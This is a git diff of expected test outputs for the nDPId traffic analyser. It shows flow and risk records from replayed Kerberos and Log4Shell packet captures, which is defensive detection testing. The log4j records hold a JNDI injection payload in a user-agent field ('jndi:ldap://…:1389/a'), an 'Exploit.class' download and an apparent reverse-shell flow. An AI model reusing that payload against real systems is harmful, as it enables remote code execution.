-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","ndpi": {"proto":"SMBv23","breed":"Acceptable","category":"System"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","total-events-serialized":187}
+00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","total-events-serialized":191}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 77/77
 ~~ skipped flows.............: 0
@@ -193,9 +197,9 @@
 ~~ total active/idle flows...: 36/36
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4690262 bytes
-~~ total memory freed........: 4690262 bytes
-~~ total allocations/frees...: 99760/99760
+~~ total memory allocated....: 4763735 bytes
+~~ total memory freed........: 4763735 bytes
+~~ total allocations/frees...: 101350/101350
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 2416 chars
diff --git a/test/results/kerberos_fuzz.pcapng.out b/test/results/kerberos_fuzz.pcapng.out
index 250c6d22c..f65b80321 100644
--- a/test/results/kerberos_fuzz.pcapng.out
+++ b/test/results/kerberos_fuzz.pcapng.out
@@ -1,7 +1,7 @@
 00447{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3}
 00801{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":288,"pkt_l4_len":268,"ts_msec":1633884084000,"pkt":"RSYBIAFKAAAABn0BfgQBABMAAAAAWNGOAAAAAAAAAQAgAQAAAAAAAGZfRk9VTgAGA0QNChsbGxsbGxsbGxsbJwYGBgYGBgYGBhsbG10bGwYGBgYGBgYGBg0K\/\/\/\/\/05NRWGMG2VyMUnz8\/NDQQEAAAAAAABdKgC3MFD\/AAAAAABfAAAAAAAAAEVhjGlkO\/\/\/\/\/\/\/b2VyWQAAAAAAAABNRQAAAAAAAAAAAAAAAAAAAAAATUxAU0m3MFCjL1MuMlQg80NBTk1FYYxpZDsNCv\/\/\/\/9OTUVhjBtlcjFJ8\/P\/\/\/\/\/AAAAAAAAXSoAtzBQoy9TLkFOTUVhjGlkOw0K\/\/\/\/\/zsNCv\/\/\/\/8vUy4yVEFUIPNDQU5NRWGMaWQ7DQr\/\/\/\/\/"}
-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1ica","username":""}}
+00697{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1ica","username":""}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3}
 00162{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -12,9 +12,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 167 chars
 ~~ json string max len.......: 806 chars
diff --git a/test/results/log4j-webapp-exploit.pcap.out b/test/results/log4j-webapp-exploit.pcap.out
index ea9bb5d83..b3402d0d8 100644
--- a/test/results/log4j-webapp-exploit.pcap.out
+++ b/test/results/log4j-webapp-exploit.pcap.out
@@ -3,7 +3,7 @@
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425815407,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADxjYEAAPQamLqwQ7gGsEO4KB8AfkHmWgrEAAAAAoAL68JU2AAACBAW0BAIICq34shoAAAAAAQMDBw=="}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425815407,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADwAAEAAQAYGj6wQ7gqsEO4BH5AHwIo9\/lB5loKyoBJxIDRcAAACBAW0BAIICmhBAYSt+LIaAQMDBw=="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639425815408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1639425815408,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADRjYUAAPQamNawQ7gGsEO4KB8AfkHmWgrKKPf5RgBAB9sqWAAABAQgKrfiyHGhBAYQ="}
-00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}}
 00348{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAABAkKsEO4KrBDuCgAAAAAAAKwQ7gs="}
 00179{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":113,"thread_id":0,"packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054}
 00348{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"ts_msec":1639425815682,"pkt":"AAAAAQAGAkKsEO4LAAAIBgABCAAGBAACAkKsEO4LrBDuCwJCrBDuCqwQ7go="}
@@ -12,13 +12,13 @@
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639425815682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADycRUAAQAZqP6wQ7gqsEO4L4TIFbQLNSvsAAAAAoAJyEDRmAAACBAW0BAIICvIpEmgAAAAAAQMDBw=="}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639425815683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425815683,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hMnt33KkCzUr8oBJxIDRmAAACBAW0BAIICingw2TyKRJoAQMDBw=="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1639425815683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1639425815683,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADScRkAAQAZqRqwQ7gqsEO4L4TIFbQLNSvx7d9yqgBAA5TReAAABAQgK8ikSaCngw2Q="}
-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815910,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1639425815910,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzhTUAAQAYlN6wQ7gqsEO4LvTwAUKwpPLEAAAAAoAJyEDRmAAACBAW0BAIICvIpE0sAAAAAAQMDBw=="}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425815910,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9PH3sGAysKTyyoBJxIDRmAAACBAW0BAIICingxEfyKRNLAQMDBw=="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADThTkAAQAYlPqwQ7gqsEO4LvTwAUKwpPLJ97BgNgBAA5TReAAABAQgK8ikTSyngxEc="}
-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}}
-00862{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4":"Binary application transfer","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}}
+00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}}
+01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815944,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1639425815944,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADw8h0AAQAZP8awQ7goKCgof2HAjKVh5kSAAAAAAoAJyEK5yAAACBAW0BAIICq5YAo8AAAAAAQMDBw=="}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADwAAEAAQAaMeAoKCh+sEO4KIynYcLp2lFRYeZEhoBJxIK5yAAACBAW0BAIICiCvi5+uWAKPAQMDBw=="}
@@ -32,24 +32,24 @@
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNdkAAQAa5DqwQ7gqsEO4L4Y4FbXfaWIQAAAAAoAJyEDRmAAACBAW0BAIICvIpXGkAAAAAAQMDBw=="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425834628,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hjinD15132liFoBJxIDRmAAACBAW0BAIICinhDWbyKVxpAQMDBw=="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADRNd0AAQAa5FawQ7gqsEO4L4Y4FbXfaWIUpw9eegBAA5TReAAABAQgK8ilcainhDWY="}
-00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834639,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1639425834639,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
